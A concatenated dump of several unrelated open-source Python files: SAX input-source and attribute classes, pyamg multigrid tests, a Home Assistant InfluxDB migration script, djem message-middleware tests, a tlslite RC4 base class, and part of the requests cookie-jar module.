stream specified, but it will use a byte stream in preference
to opening a URI connection itself.
If the application knows the character encoding of the byte
stream, it should set it with the setEncoding method."""
self.__bytefile = bytefile
def getByteStream(self):
"""Get the byte stream for this input source.
The getEncoding method will return the character encoding for
this byte stream, or None if unknown."""
return self.__bytefile
def setCharacterStream(self, charfile):
"""Set the character stream for this input source. (The stream
must be a Python 2.0 Unicode-wrapped file-like that performs
conversion to Unicode strings.)
If there is a character stream specified, the SAX parser will
ignore any byte stream and will not attempt to open a URI
connection to the system identifier."""
self.__charfile = charfile
def getCharacterStream(self):
"Get the character stream for this input source."
return self.__charfile
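# Illustrative construction (added for exposition) of an InputSource carrying
# a byte stream and its known encoding; a parser will prefer this stream over
# opening the system identifier itself. The URL is a placeholder.
def _make_input_source_sketch(byte_stream):
    source = InputSource("http://example.com/doc.xml")
    source.setEncoding("utf-8")        # must be valid for an XML declaration
    source.setByteStream(byte_stream)  # ignored if a character stream is set
    return source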
# ===== ATTRIBUTESIMPL =====
class AttributesImpl:
def __init__(self, attrs):
"""Non-NS-aware implementation.
attrs should be of the form {name : value}."""
self._attrs = attrs
def getLength(self):
return len(self._attrs)
def getType(self, name):
return "CDATA"
def getValue(self, name):
return self._attrs[name]
def getValueByQName(self, name):
return self._attrs[name]
def getNameByQName(self, name):
        if name not in self._attrs:
raise KeyError, name
return name
def getQNameByName(self, name):
        if name not in self._attrs:
raise KeyError, name
return name
def getNames(self):
return self._attrs.keys()
def getQNames(self):
return self._attrs.keys()
def __len__(self):
return len(self._attrs)
def __getitem__(self, name):
return self._attrs[name]
def keys(self):
return self._attrs.keys()
def has_key(self, name):
return name in self._attrs
def __contains__(self, name):
        return name in self._attrs
def get(self, name, alternative=None):
return self._attrs.get(name, alternative)
def copy(self):
return self.__class__(self._attrs)
def items(self):
return self._attrs.items()
def values(self):
return self._attrs.values()
# ===== ATTRIBUTESNSIMPL =====
class AttributesNSImpl(AttributesImpl):
def __init__(self, attrs, qnames):
"""NS-aware implementation.
attrs should be of the form {(ns_uri, lname): value, ...}.
qnames of the form {(ns_uri, lname): qname, ...}."""
self._attrs = attrs
self._qnames = qnames
def getValueByQName(self, name):
for (nsname, qname) in self._qnames.items():
if qname == name:
return self._attrs[nsname]
raise KeyError, name
def getNameByQName(self, name):
for (nsname, qname) in self._qnames.items():
if qname == name:
return nsname
raise KeyError, name
def getQNameByName(self, name):
return self._qnames[name]
def getQNames(self):
return self._qnames.values()
def copy(self):
return self.__class__(self._attrs, self._qnames)
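# Illustrative usage (added for exposition) of the two attribute collections;
# the NS-aware variant is keyed by (namespace_uri, localname) pairs.
def _attributes_sketch():
    plain = AttributesImpl({"id": "a1"})
    assert plain.getValue("id") == "a1" and "id" in plain
    ns = AttributesNSImpl({(u"http://ns", u"id"): "a1"},
                          {(u"http://ns", u"id"): u"x:id"})
    assert ns.getValueByQName(u"x:id") == "a1"
    assert ns.getQNameByName((u"http://ns", u"id")) == u"x:id"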
def _test():
XMLReader()
IncrementalParser()
Locator()
if __name__ == "__main__":
_test()
|
pombreda/pyamg
|
refs/heads/master
|
pyamg/classical/tests/test_classical.py
|
1
|
from pyamg.testing import *
import numpy
from numpy import ravel, ones, concatenate, cumsum, zeros
from scipy import rand
from scipy.sparse import csr_matrix, lil_matrix, coo_matrix
from pyamg.gallery import poisson, load_example
from pyamg.strength import classical_strength_of_connection
from pyamg.classical import split
from pyamg.classical.classical import ruge_stuben_solver
from pyamg.classical.interpolate import direct_interpolation
class TestRugeStubenFunctions(TestCase):
def setUp(self):
self.cases = []
# random matrices
numpy.random.seed(0)
for N in [2,3,5]:
self.cases.append( csr_matrix(rand(N,N)) )
# Poisson problems in 1D and 2D
for N in [2,3,5,7,10,11,19]:
self.cases.append( poisson( (N,), format='csr') )
for N in [2,3,5,7,10,11]:
self.cases.append( poisson( (N,N), format='csr') )
for name in ['knot','airfoil','bar']:
ex = load_example(name)
self.cases.append( ex['A'].tocsr() )
def test_RS_splitting(self):
for A in self.cases:
S = classical_strength_of_connection(A, 0.0)
splitting = split.RS( S )
assert( splitting.min() >= 0 ) #could be all 1s
assert_equal( splitting.max(), 1 )
S.data[:] = 1
# check that all F-nodes are strongly connected to a C-node
assert( (splitting + S*splitting).min() > 0 )
### THIS IS NOT STRICTLY ENFORCED!
## check that all strong connections S[i,j] satisfy either:
## (0) i is a C-node
## (1) j is a C-node
## (2) k is a C-node and both i and j are strongly connected to k
#
#X = S.tocoo()
## remove C->F edges (i.e. S[i,j] where (0) holds )
#mask = splitting[X.row] == 0
#X.row = X.row[mask]
#X.col = X.col[mask]
#X.data = X.data[mask]
## remove F->C edges (i.e. S[i,j] where (1) holds )
#mask = splitting[X.col] == 0
#X.row = X.row[mask]
#X.col = X.col[mask]
#X.data = X.data[mask]
## X now consists of strong F->F edges only
#
## (S * S.T)[i,j] is the # of C nodes on which both i and j
## strongly depend (i.e. the number of k's where (2) holds)
#Y = (S*S.T) - X
#assert( Y.nnz == 0 or Y.data.min() > 0 )
def test_cljp_splitting(self):
for A in self.cases:
S = classical_strength_of_connection(A, 0.0)
splitting = split.CLJP( S )
assert( splitting.min() >= 0 ) #could be all 1s
assert_equal( splitting.max(), 1 )
S.data[:] = 1
# check that all F-nodes are strongly connected to a C-node
assert( (splitting + S*splitting).min() > 0 )
def test_cljpc_splitting(self):
for A in self.cases:
S = classical_strength_of_connection(A, 0.0)
splitting = split.CLJPc( S )
assert( splitting.min() >= 0 ) #could be all 1s
assert_equal( splitting.max(), 1 )
S.data[:] = 1
# check that all F-nodes are strongly connected to a C-node
assert( (splitting + S*splitting).min() > 0 )
def test_direct_interpolation(self):
for A in self.cases:
S = classical_strength_of_connection(A, 0.0)
splitting = split.RS( S )
result = direct_interpolation(A,S,splitting)
expected = reference_direct_interpolation( A, S, splitting )
assert_almost_equal( result.todense(), expected.todense() )
class TestSolverPerformance(TestCase):
def test_poisson(self):
cases = []
cases.append( (500,) )
cases.append( (250,250) )
cases.append( (25,25,25) )
for case in cases:
A = poisson( case, format='csr' )
numpy.random.seed(0) #make tests repeatable
x = rand(A.shape[0])
b = A*rand(A.shape[0]) #zeros_like(x)
ml = ruge_stuben_solver(A, max_coarse=50)
residuals = []
x_sol = ml.solve(b, x0=x, maxiter=20, tol=1e-12, residuals=residuals)
avg_convergence_ratio = (residuals[-1]/residuals[0])**(1.0/len(residuals))
assert(avg_convergence_ratio < 0.20)
def test_matrix_formats(self):
        # Do dense, csr, bsr and csc versions of A all yield the same solver?
A = poisson( (7,7), format='csr')
cases = [ A.tobsr(blocksize=(1,1)) ]
cases.append(A.tocsc())
cases.append(A.todense())
rs_old = ruge_stuben_solver(A,max_coarse=10)
for AA in cases:
rs_new = ruge_stuben_solver(AA,max_coarse=10)
assert( abs( ravel( rs_old.levels[-1].A.todense() -
rs_new.levels[-1].A.todense() )).max() < 0.01 )
rs_old = rs_new
################################################
## reference implementations for unittests ##
################################################
def reference_direct_interpolation(A,S,splitting):
A = coo_matrix(A)
S = coo_matrix(S)
#strong C points
c_mask = splitting[S.col] == 1
C_s = coo_matrix( (S.data[c_mask],(S.row[c_mask],S.col[c_mask])), shape=S.shape)
#strong F points
f_mask = ~c_mask
F_s = coo_matrix( (S.data[f_mask],(S.row[f_mask],S.col[f_mask])), shape=S.shape)
# split A in to + and -
mask = (A.data > 0) & (A.row != A.col)
A_pos = coo_matrix( (A.data[mask],(A.row[mask],A.col[mask])), shape=A.shape)
mask = (A.data < 0) & (A.row != A.col)
A_neg = coo_matrix( (A.data[mask],(A.row[mask],A.col[mask])), shape=A.shape)
# split C_S in to + and -
mask = C_s.data > 0
C_s_pos = coo_matrix( (C_s.data[mask],(C_s.row[mask],C_s.col[mask])), shape=A.shape)
mask = ~mask
C_s_neg = coo_matrix( (C_s.data[mask],(C_s.row[mask],C_s.col[mask])), shape=A.shape)
sum_strong_pos = ravel(C_s_pos.sum(axis=1))
sum_strong_neg = ravel(C_s_neg.sum(axis=1))
sum_all_pos = ravel(A_pos.sum(axis=1))
sum_all_neg = ravel(A_neg.sum(axis=1))
diag = A.diagonal()
mask = (sum_strong_neg != 0.0)
alpha = numpy.zeros_like(sum_all_neg)
alpha[mask] = sum_all_neg[mask] / sum_strong_neg[mask]
mask = (sum_strong_pos != 0.0)
beta = numpy.zeros_like(sum_all_pos)
beta[mask] = sum_all_pos[mask] / sum_strong_pos[mask]
mask = sum_strong_pos == 0
diag[mask] += sum_all_pos[mask]
beta[mask] = 0
C_s_neg.data *= -alpha[C_s_neg.row]/diag[C_s_neg.row]
C_s_pos.data *= -beta[C_s_pos.row]/diag[C_s_pos.row]
C_rows = splitting.nonzero()[0]
C_inject = coo_matrix( (ones(sum(splitting)),(C_rows,C_rows)), shape=A.shape)
P = C_s_neg.tocsr() + C_s_pos.tocsr() + C_inject.tocsr()
map = concatenate(([0],cumsum(splitting)))
P = csr_matrix( (P.data,map[P.indices],P.indptr), shape=(P.shape[0],map[-1]))
return P
|
morphis/home-assistant
|
refs/heads/snap-support
|
homeassistant/scripts/influxdb_migrator.py
|
12
|
"""Script to convert an old-structure influxdb to a new one."""
import argparse
import sys
from typing import List
# Based on code at
# http://stackoverflow.com/questions/3173320/text-progress-bar-in-the-console
def print_progress(iteration: int, total: int, prefix: str = '', suffix: str = '',
                   decimals: int = 2, bar_length: int = 68) -> None:
"""Print progress bar.
Call in a loop to create terminal progress bar
@params:
iteration - Required : current iteration (Int)
total - Required : total iterations (Int)
prefix - Optional : prefix string (Str)
suffix - Optional : suffix string (Str)
decimals - Optional : number of decimals in percent complete (Int)
        bar_length - Optional : character length of bar (Int)
"""
filled_length = int(round(bar_length * iteration / float(total)))
percents = round(100.00 * (iteration / float(total)), decimals)
line = '#' * filled_length + '-' * (bar_length - filled_length)
sys.stdout.write('%s [%s] %s%s %s\r' % (prefix, line,
percents, '%', suffix))
sys.stdout.flush()
if iteration == total:
print("\n")
def run(script_args: List) -> int:
"""The actual script body."""
from influxdb import InfluxDBClient
parser = argparse.ArgumentParser(
description="Migrate legacy influxDB.")
parser.add_argument(
'-d', '--dbname',
metavar='dbname',
required=True,
help="InfluxDB database name")
parser.add_argument(
'-H', '--host',
metavar='host',
default='127.0.0.1',
help="InfluxDB host address")
parser.add_argument(
'-P', '--port',
metavar='port',
default=8086,
help="InfluxDB host port")
parser.add_argument(
'-u', '--username',
metavar='username',
default='root',
help="InfluxDB username")
parser.add_argument(
'-p', '--password',
metavar='password',
default='root',
help="InfluxDB password")
parser.add_argument(
'-s', '--step',
metavar='step',
default=1000,
help="How many points to migrate at the same time")
parser.add_argument(
'-o', '--override-measurement',
metavar='override_measurement',
default="",
help="Store all your points in the same measurement")
parser.add_argument(
'-D', '--delete',
action='store_true',
default=False,
help="Delete old database")
parser.add_argument(
'--script',
choices=['influxdb_migrator'])
args = parser.parse_args()
# Get client for old DB
client = InfluxDBClient(args.host, args.port,
args.username, args.password)
client.switch_database(args.dbname)
# Get DB list
db_list = [db['name'] for db in client.get_list_database()]
# Get measurements of the old DB
res = client.query('SHOW MEASUREMENTS')
measurements = [measurement['name'] for measurement in res.get_points()]
nb_measurements = len(measurements)
# Move data
# Get old DB name
old_dbname = "{}__old".format(args.dbname)
# Create old DB if needed
if old_dbname not in db_list:
client.create_database(old_dbname)
# Copy data to the old DB
print("Cloning from {} to {}".format(args.dbname, old_dbname))
for index, measurement in enumerate(measurements):
client.query('''SELECT * INTO {}..:MEASUREMENT FROM '''
'"{}" GROUP BY *'.format(old_dbname, measurement))
        # Print progress
print_progress(index + 1, nb_measurements)
# Delete the database
client.drop_database(args.dbname)
# Create new DB if needed
client.create_database(args.dbname)
client.switch_database(old_dbname)
# Get client for new DB
new_client = InfluxDBClient(args.host, args.port, args.username,
args.password, args.dbname)
# Counter of points without time
point_wt_time = 0
print("Migrating from {} to {}".format(old_dbname, args.dbname))
    # Walk over each measurement
for index, measurement in enumerate(measurements):
# Get tag list
res = client.query('''SHOW TAG KEYS FROM "{}"'''.format(measurement))
tags = [v['tagKey'] for v in res.get_points()]
# Get field list
res = client.query('''SHOW FIELD KEYS FROM "{}"'''.format(measurement))
fields = [v['fieldKey'] for v in res.get_points()]
# Get points, convert and send points to the new DB
offset = 0
while True:
nb_points = 0
# Prepare new points
new_points = []
# Get points
res = client.query('SELECT * FROM "{}" LIMIT {} OFFSET '
'{}'.format(measurement, args.step, offset))
for point in res.get_points():
new_point = {"tags": {},
"fields": {},
"time": None}
if args.override_measurement:
new_point["measurement"] = args.override_measurement
else:
new_point["measurement"] = measurement
# Check time
if point["time"] is None:
# Point without time
point_wt_time += 1
print("Can not convert point without time")
continue
# Convert all fields
for field in fields:
try:
new_point["fields"][field] = float(point[field])
except (ValueError, TypeError):
if field == "value":
new_key = "state"
else:
new_key = "{}_str".format(field)
new_point["fields"][new_key] = str(point[field])
# Add tags
for tag in tags:
new_point["tags"][tag] = point[tag]
# Set time
new_point["time"] = point["time"]
# Add new point to the new list
new_points.append(new_point)
# Count nb points
nb_points += 1
# Send to the new db
try:
new_client.write_points(new_points)
except Exception as exp:
raise exp
# If there is no points
if nb_points == 0:
# print("Measurement {} migrated".format(measurement))
break
else:
# Increment offset
offset += args.step
        # Print progress
print_progress(index + 1, nb_measurements)
# Delete database if needed
if args.delete:
print("Dropping {}".format(old_dbname))
client.drop_database(old_dbname)
|
oogles/djem
|
refs/heads/master
|
djem/tests/test_middleware.py
|
2
|
from __future__ import unicode_literals
from django.conf.urls import url
from django.contrib import messages
from django.contrib.messages import constants
from django.http import HttpRequest, HttpResponse
from django.test import Client, TestCase, override_settings
from djem.middleware import MemoryStorage
def add_message_view(request):
msg = request.GET['msg']
messages.info(request, msg)
if request.is_ajax():
prefix = 'AJAX'
else:
prefix = 'STANDARD'
return HttpResponse('{0}: no messages'.format(prefix))
def add_read_message_view(request):
msg = request.GET['msg']
messages.info(request, msg)
    content = ', '.join([m.message for m in messages.get_messages(request)])
if request.is_ajax():
prefix = 'AJAX'
else:
prefix = 'STANDARD'
return HttpResponse('{0}: {1}'.format(prefix, content))
urlpatterns = [
url(r'^messages/add/$', add_message_view),
url(r'^messages/add/read/$', add_read_message_view),
]
djem_middleware_settings = override_settings(
ROOT_URLCONF='djem.tests.test_middleware',
MIDDLEWARE=[
'django.contrib.sessions.middleware.SessionMiddleware',
'djem.middleware.MessageMiddleware'
]
)
django_middleware_settings = override_settings(
ROOT_URLCONF='djem.tests.test_middleware',
MIDDLEWARE=[
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.messages.middleware.MessageMiddleware'
]
)
class MemoryStorageTestCase(TestCase):
def test_add(self):
"""
Test messages can be added and retrieved as expected.
"""
# Create a message store with a fake request instance
messages = MemoryStorage(HttpRequest())
self.assertEqual(len(messages), 0)
messages.add(constants.INFO, 'Test message')
self.assertEqual(len(messages), 1)
messages.add(constants.INFO, 'Another test message')
self.assertEqual(len(messages), 2)
# Read the message store
message_list = list(messages)
messages.add(constants.INFO, 'A third test message')
self.assertEqual(len(message_list), 2)
self.assertEqual(len(messages), 3)
class MessageMiddlewareTestCase(TestCase):
def setUp(self):
self.client = Client()
@djem_middleware_settings
def test_standard_request(self):
"""
Test that messages added via the message framework, on a standard
request, can be read back when using djem's MessageMiddleware.
"""
response = self.client.get(
'/messages/add/read/',
{'msg': 'test message'}
)
self.assertEqual(response.content, b'STANDARD: test message')
@djem_middleware_settings
def test_ajax_request(self):
"""
Test that messages added via the message framework, on an AJAX
request, can be read back when using djem's MessageMiddleware.
"""
response = self.client.get(
'/messages/add/read/',
{'msg': 'test message'},
HTTP_X_REQUESTED_WITH='XMLHttpRequest'
)
self.assertEqual(response.content, b'AJAX: test message')
@djem_middleware_settings
def test_mixed_requests(self):
"""
Test that messages added on standard requests and AJAX requests use
different stores and do not interfere with each other when using djem's
MessageMiddleware.
"""
# Start with a standard request that adds a message, but doesn't read
# back the message store
response = self.client.get(
'/messages/add/',
{'msg': 'first standard message'}
)
self.assertEqual(response.content, b'STANDARD: no messages')
# Next, trigger an AJAX request that adds a message, but also doesn't
# read back the message store. This message should be lost once the
# request is completed.
response = self.client.get(
'/messages/add/',
{'msg': 'lost ajax message'},
HTTP_X_REQUESTED_WITH='XMLHttpRequest'
)
self.assertEqual(response.content, b'AJAX: no messages')
# Then trigger an AJAX request that adds a message and does read back
# the message store - it should only see the message it added, not
# either of the two previous messages.
response = self.client.get(
'/messages/add/read/',
{'msg': 'ajax message'},
HTTP_X_REQUESTED_WITH='XMLHttpRequest'
)
self.assertEqual(response.content, b'AJAX: ajax message')
# Finally, trigger another standard request that adds a message and
# reads back the message store - it should see the two messages added
# as part of standard requests, and not those added in the AJAX request
response = self.client.get(
'/messages/add/read/',
{'msg': 'second standard message'}
)
self.assertEqual(response.content, b'STANDARD: first standard message, second standard message')
@django_middleware_settings
def test_django_mixed_requests(self):
"""
Test that messages added on standard requests and AJAX requests DO
interfere with each other when using Django's MessageMiddleware.
"""
# Start with a standard request that adds a message, but doesn't read
# back the message store
response = self.client.get(
'/messages/add/',
{'msg': 'first standard message'}
)
self.assertEqual(response.content, b'STANDARD: no messages')
# Then trigger an AJAX request that adds a message and does read back
# the message store - it sees all messages
response = self.client.get(
'/messages/add/read/',
{'msg': 'ajax message'},
HTTP_X_REQUESTED_WITH='XMLHttpRequest'
)
self.assertEqual(response.content, b'AJAX: first standard message, ajax message')
# Finally, trigger another standard request that adds a message and
# reads back the message store - it only sees its own message, since
# the others were consumed by the intervening AJAX request
response = self.client.get(
'/messages/add/read/',
{'msg': 'second standard message'}
)
self.assertEqual(response.content, b'STANDARD: second standard message')
|
hujiajie/pa-chromium
|
refs/heads/master
|
third_party/tlslite/tlslite/utils/RC4.py
|
359
|
"""Abstract class for RC4."""
from compat import * #For False
class RC4:
def __init__(self, keyBytes, implementation):
if len(keyBytes) < 16 or len(keyBytes) > 256:
            raise ValueError("RC4 key length must be between 16 and 256 bytes")
self.isBlockCipher = False
self.name = "rc4"
self.implementation = implementation
def encrypt(self, plaintext):
raise NotImplementedError()
def decrypt(self, ciphertext):
raise NotImplementedError()
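# A rough sketch (not part of tlslite) of a concrete subclass implementing
# the textbook RC4 key schedule (KSA) and keystream generator (PRGA). It
# assumes keyBytes and the data are sequences of ints (e.g. bytearray);
# tlslite's real OpenSSL/PyCrypto/pure-Python implementations live elsewhere.
class RC4Sketch(RC4):
    def __init__(self, keyBytes):
        RC4.__init__(self, keyBytes, "python")
        S = list(range(256))
        j = 0
        for i in range(256):  # KSA: shuffle S under the key
            j = (j + S[i] + keyBytes[i % len(keyBytes)]) % 256
            S[i], S[j] = S[j], S[i]
        self.S, self.i, self.j = S, 0, 0
    def encrypt(self, plaintext):
        S, i, j = self.S, self.i, self.j
        out = bytearray()
        for b in plaintext:  # PRGA: XOR each byte with the next keystream byte
            i = (i + 1) % 256
            j = (j + S[i]) % 256
            S[i], S[j] = S[j], S[i]
            out.append(b ^ S[(S[i] + S[j]) % 256])
        self.i, self.j = i, j
        return out
    decrypt = encrypt  # RC4 applies the same keystream in both directions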
|
EliteTK/PyBot
|
refs/heads/master
|
Modules/requests/cookies.py
|
413
|
# -*- coding: utf-8 -*-
"""
Compatibility code to be able to use `cookielib.CookieJar` with requests.
requests.utils imports from here, so be careful with imports.
"""
import copy
import time
import collections
from .compat import cookielib, urlparse, urlunparse, Morsel
try:
import threading
# grr, pyflakes: this fixes "redefinition of unused 'threading'"
threading
except ImportError:
import dummy_threading as threading
class MockRequest(object):
"""Wraps a `requests.Request` to mimic a `urllib2.Request`.
The code in `cookielib.CookieJar` expects this interface in order to correctly
manage cookie policies, i.e., determine whether a cookie can be set, given the
domains of the request and the cookie.
The original request object is read-only. The client is responsible for collecting
the new headers via `get_new_headers()` and interpreting them appropriately. You
probably want `get_cookie_header`, defined below.
"""
def __init__(self, request):
self._r = request
self._new_headers = {}
self.type = urlparse(self._r.url).scheme
def get_type(self):
return self.type
def get_host(self):
return urlparse(self._r.url).netloc
def get_origin_req_host(self):
return self.get_host()
def get_full_url(self):
# Only return the response's URL if the user hadn't set the Host
# header
if not self._r.headers.get('Host'):
return self._r.url
# If they did set it, retrieve it and reconstruct the expected domain
host = self._r.headers['Host']
parsed = urlparse(self._r.url)
# Reconstruct the URL as we expect it
return urlunparse([
parsed.scheme, host, parsed.path, parsed.params, parsed.query,
parsed.fragment
])
def is_unverifiable(self):
return True
def has_header(self, name):
return name in self._r.headers or name in self._new_headers
def get_header(self, name, default=None):
return self._r.headers.get(name, self._new_headers.get(name, default))
def add_header(self, key, val):
"""cookielib has no legitimate use for this method; add it back if you find one."""
raise NotImplementedError("Cookie headers should be added with add_unredirected_header()")
def add_unredirected_header(self, name, value):
self._new_headers[name] = value
def get_new_headers(self):
return self._new_headers
@property
def unverifiable(self):
return self.is_unverifiable()
@property
def origin_req_host(self):
return self.get_origin_req_host()
@property
def host(self):
return self.get_host()
class MockResponse(object):
"""Wraps a `httplib.HTTPMessage` to mimic a `urllib.addinfourl`.
...what? Basically, expose the parsed HTTP headers from the server response
the way `cookielib` expects to see them.
"""
def __init__(self, headers):
"""Make a MockResponse for `cookielib` to read.
:param headers: a httplib.HTTPMessage or analogous carrying the headers
"""
self._headers = headers
def info(self):
return self._headers
def getheaders(self, name):
        return self._headers.getheaders(name)
def extract_cookies_to_jar(jar, request, response):
"""Extract the cookies from the response into a CookieJar.
:param jar: cookielib.CookieJar (not necessarily a RequestsCookieJar)
:param request: our own requests.Request object
:param response: urllib3.HTTPResponse object
"""
if not (hasattr(response, '_original_response') and
response._original_response):
return
# the _original_response field is the wrapped httplib.HTTPResponse object,
req = MockRequest(request)
# pull out the HTTPMessage with the headers and put it in the mock:
res = MockResponse(response._original_response.msg)
jar.extract_cookies(res, req)
def get_cookie_header(jar, request):
"""Produce an appropriate Cookie header string to be sent with `request`, or None."""
r = MockRequest(request)
jar.add_cookie_header(r)
return r.get_new_headers().get('Cookie')
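# Illustration (sketch, not library code) of how the two helpers above pair
# up around a request/response cycle; `session` and `prepared_request` are
# hypothetical names:
#   header = get_cookie_header(session.cookies, prepared_request)
#   # ... send the request, obtain `response` (a urllib3.HTTPResponse) ...
#   extract_cookies_to_jar(session.cookies, prepared_request, response)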
def remove_cookie_by_name(cookiejar, name, domain=None, path=None):
"""Unsets a cookie by name, by default over all domains and paths.
Wraps CookieJar.clear(), is O(n).
"""
clearables = []
for cookie in cookiejar:
if cookie.name == name:
if domain is None or domain == cookie.domain:
if path is None or path == cookie.path:
clearables.append((cookie.domain, cookie.path, cookie.name))
for domain, path, name in clearables:
cookiejar.clear(domain, path, name)
class CookieConflictError(RuntimeError):
"""There are two cookies that meet the criteria specified in the cookie jar.
Use .get and .set and include domain and path args in order to be more specific."""
class RequestsCookieJar(cookielib.CookieJar, collections.MutableMapping):
"""Compatibility class; is a cookielib.CookieJar, but exposes a dict
interface.
This is the CookieJar we create by default for requests and sessions that
don't specify one, since some clients may expect response.cookies and
session.cookies to support dict operations.
Requests does not use the dict interface internally; it's just for
compatibility with external client code. All requests code should work
out of the box with externally provided instances of ``CookieJar``, e.g.
``LWPCookieJar`` and ``FileCookieJar``.
Unlike a regular CookieJar, this class is pickleable.
.. warning:: dictionary operations that are normally O(1) may be O(n).
"""
def get(self, name, default=None, domain=None, path=None):
"""Dict-like get() that also supports optional domain and path args in
order to resolve naming collisions from using one cookie jar over
multiple domains.
.. warning:: operation is O(n), not O(1)."""
try:
return self._find_no_duplicates(name, domain, path)
except KeyError:
return default
def set(self, name, value, **kwargs):
"""Dict-like set() that also supports optional domain and path args in
order to resolve naming collisions from using one cookie jar over
multiple domains."""
# support client code that unsets cookies by assignment of a None value:
if value is None:
remove_cookie_by_name(self, name, domain=kwargs.get('domain'), path=kwargs.get('path'))
return
if isinstance(value, Morsel):
c = morsel_to_cookie(value)
else:
c = create_cookie(name, value, **kwargs)
self.set_cookie(c)
return c
def iterkeys(self):
"""Dict-like iterkeys() that returns an iterator of names of cookies
from the jar. See itervalues() and iteritems()."""
for cookie in iter(self):
yield cookie.name
def keys(self):
"""Dict-like keys() that returns a list of names of cookies from the
jar. See values() and items()."""
return list(self.iterkeys())
def itervalues(self):
"""Dict-like itervalues() that returns an iterator of values of cookies
from the jar. See iterkeys() and iteritems()."""
for cookie in iter(self):
yield cookie.value
def values(self):
"""Dict-like values() that returns a list of values of cookies from the
jar. See keys() and items()."""
return list(self.itervalues())
def iteritems(self):
"""Dict-like iteritems() that returns an iterator of name-value tuples
from the jar. See iterkeys() and itervalues()."""
for cookie in iter(self):
yield cookie.name, cookie.value
def items(self):
"""Dict-like items() that returns a list of name-value tuples from the
        jar. See keys() and values(). Allows client code to call
        ``dict(RequestsCookieJar)`` and get a vanilla Python dict of key-value
        pairs."""
return list(self.iteritems())
def list_domains(self):
"""Utility method to list all the domains in the jar."""
domains = []
for cookie in iter(self):
if cookie.domain not in domains:
domains.append(cookie.domain)
return domains
def list_paths(self):
"""Utility method to list all the paths in the jar."""
paths = []
for cookie in iter(self):
if cookie.path not in paths:
paths.append(cookie.path)
return paths
def multiple_domains(self):
"""Returns True if there are multiple domains in the jar.
Returns False otherwise."""
domains = []
for cookie in iter(self):
if cookie.domain is not None and cookie.domain in domains:
return True
domains.append(cookie.domain)
return False # there is only one domain in jar
def get_dict(self, domain=None, path=None):
"""Takes as an argument an optional domain and path and returns a plain
old Python dict of name-value pairs of cookies that meet the
requirements."""
dictionary = {}
for cookie in iter(self):
if (domain is None or cookie.domain == domain) and (path is None
or cookie.path == path):
dictionary[cookie.name] = cookie.value
return dictionary
def __getitem__(self, name):
"""Dict-like __getitem__() for compatibility with client code. Throws
exception if there are more than one cookie with name. In that case,
use the more explicit get() method instead.
.. warning:: operation is O(n), not O(1)."""
return self._find_no_duplicates(name)
def __setitem__(self, name, value):
"""Dict-like __setitem__ for compatibility with client code. Throws
exception if there is already a cookie of that name in the jar. In that
case, use the more explicit set() method instead."""
self.set(name, value)
def __delitem__(self, name):
"""Deletes a cookie given a name. Wraps ``cookielib.CookieJar``'s
``remove_cookie_by_name()``."""
remove_cookie_by_name(self, name)
def set_cookie(self, cookie, *args, **kwargs):
if hasattr(cookie.value, 'startswith') and cookie.value.startswith('"') and cookie.value.endswith('"'):
cookie.value = cookie.value.replace('\\"', '')
return super(RequestsCookieJar, self).set_cookie(cookie, *args, **kwargs)
def update(self, other):
"""Updates this jar with cookies from another CookieJar or dict-like"""
if isinstance(other, cookielib.CookieJar):
for cookie in other:
self.set_cookie(copy.copy(cookie))
else:
super(RequestsCookieJar, self).update(other)
def _find(self, name, domain=None, path=None):
"""Requests uses this method internally to get cookie values. Takes as
args name and optional domain and path. Returns a cookie.value. If
there are conflicting cookies, _find arbitrarily chooses one. See
_find_no_duplicates if you want an exception thrown if there are
conflicting cookies."""
for cookie in iter(self):
if cookie.name == name:
if domain is None or cookie.domain == domain:
if path is None or cookie.path == path:
return cookie.value
raise KeyError('name=%r, domain=%r, path=%r' % (name, domain, path))
def _find_no_duplicates(self, name, domain=None, path=None):
"""Both ``__get_item__`` and ``get`` call this function: it's never
used elsewhere in Requests. Takes as args name and optional domain and
path. Returns a cookie.value. Throws KeyError if cookie is not found
and CookieConflictError if there are multiple cookies that match name
and optionally domain and path."""
toReturn = None
for cookie in iter(self):
if cookie.name == name:
if domain is None or cookie.domain == domain:
if path is None or cookie.path == path:
if toReturn is not None: # if there are multiple cookies that meet passed in criteria
raise CookieConflictError('There are multiple cookies with name, %r' % (name))
toReturn = cookie.value # we will eventually return this as long as no cookie conflict
if toReturn:
return toReturn
raise KeyError('name=%r, domain=%r, path=%r' % (name, domain, path))
def __getstate__(self):
"""Unlike a normal CookieJar, this class is pickleable."""
state = self.__dict__.copy()
# remove the unpickleable RLock object
state.pop('_cookies_lock')
return state
def __setstate__(self, state):
"""Unlike a normal CookieJar, this class is pickleable."""
self.__dict__.update(state)
if '_cookies_lock' not in self.__dict__:
self._cookies_lock = threading.RLock()
def copy(self):
"""Return a copy of this RequestsCookieJar."""
new_cj = RequestsCookieJar()
new_cj.update(self)
return new_cj
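# A quick illustration (not part of the library) of the dict interface above:
#   jar = RequestsCookieJar()
#   jar.set('token', 'abc', domain='a.example.com', path='/')
#   jar.set('token', 'xyz', domain='b.example.com', path='/')
#   jar.keys()                                -> ['token', 'token']
#   jar.get('token', domain='a.example.com')  -> 'abc'
#   jar['token']                              -> raises CookieConflictError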
def _copy_cookie_jar(jar):
if jar is None:
return None
if hasattr(jar, 'copy'):
    # We're dealing with an instance of RequestsCookieJar
return jar.copy()
# We're dealing with a generic CookieJar instance
new_jar = copy.copy(jar)
new_jar.clear()
for cookie in jar:
new_jar.set_cookie(copy.copy(cookie))
return new_jar
def create_cookie(name, value, **kwargs):
"""Make a cookie from underspecified parameters.
By default, the pair of `name` and `value` will be set for the domain ''
and sent on every request (this is sometimes called a "supercookie").
"""
result = dict(
version=0,
name=name,
value=value,
port=None,
domain='',
path='/',
secure=False,
expires=None,
discard=True,
comment=None,
comment_url=None,
rest={'HttpOnly': None},
rfc2109=False,)
badargs = set(kwargs) - set(result)
if badargs:
err = 'create_cookie() got unexpected keyword arguments: %s'
raise TypeError(err % list(badargs))
result.update(kwargs)
result['port_specified'] = bool(result['port'])
result['domain_specified'] = bool(result['domain'])
result['domain_initial_dot'] = result['domain'].startswith('.')
result['path_specified'] = bool(result['path'])
return cookielib.Cookie(**result)
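# For example (sketch): create_cookie('k', 'v') yields a "supercookie" sent
# with every request, while extra kwargs scope it to one site:
#   c = create_cookie('k', 'v', domain='.example.com', path='/app',
#                     secure=True, expires=1893456000)
# An unrecognised kwarg such as flavour='oatmeal' raises TypeError.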
def morsel_to_cookie(morsel):
"""Convert a Morsel object into a Cookie containing the one k/v pair."""
expires = None
if morsel['max-age']:
expires = time.time() + morsel['max-age']
